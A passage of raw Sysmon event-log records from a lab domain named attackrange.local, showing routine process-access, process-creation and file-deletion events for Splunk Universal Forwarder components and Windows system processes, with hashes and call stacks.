Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000439716Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:48.746{42DC5269-01DC-6088-B028-00000000BA01}4188C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000439715Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:48.562{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30457815DDC67C1960615654498F5D3F,SHA256=3A2F97205F7427FD8951CAF11003B3072657D55C75F5182D889C388884B4A025,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291098Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:48.586{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47BD54F75E4836FE3259DD9A41240A25,SHA256=CAA01375AC9A1F6272C91ED8E8B7EAEE348B8315C0DEDF2CC4373C4BC84C7D4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439714Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:48.426{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7C4695ECF2B15D737305AD1E5E4666B4,SHA256=996F90BCCA8A388B4E12528ED6D42EBE6F58D70A0A40FDD70F7E8FA23493D7D0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439713Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:48.214{42DC5269-01DC-6088-AF28-00000000BA01}18526644C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439712Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:48.081{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-01DC-6088-AF28-00000000BA01}1852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439711Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:48.080{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439710Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:48.080{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439709Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:48.080{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439708Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:48.080{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439707Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:48.080{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439706Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:48.080{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439705Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:48.080{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439704Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:48.079{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439703Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:48.079{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439702Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:48.079{42DC5269-CE96-6086-0500-00000000BA01}412428C:\Windows\system32\csrss.exe{42DC5269-01DC-6088-AF28-00000000BA01}1852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000439701Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:48.079{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-01DC-6088-AF28-00000000BA01}1852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000439700Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:48.079{42DC5269-01DC-6088-AF28-00000000BA01}1852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000439699Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:48.058{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439698Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:48.058{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439748Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:49.790{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=431088AEFBEF0766B402661568215A2F,SHA256=478BC95E4E3BEFD20AE2E2F1E53CE1F81773EDF573F5E75223027366041099FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291099Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:49.588{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=745A55CE16ED807FE53739C0A94880ED,SHA256=3FF72B97E8950AF17FDEE468493328FEEFC3E600A980A98710BE09D2289E58FF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439747Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:49.560{42DC5269-01DD-6088-B128-00000000BA01}67883824C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439746Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:49.429{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-01DD-6088-B128-00000000BA01}6788C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439745Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:49.428{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439744Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:49.428{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439743Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:49.428{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439742Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:49.428{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439741Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:49.428{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439740Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 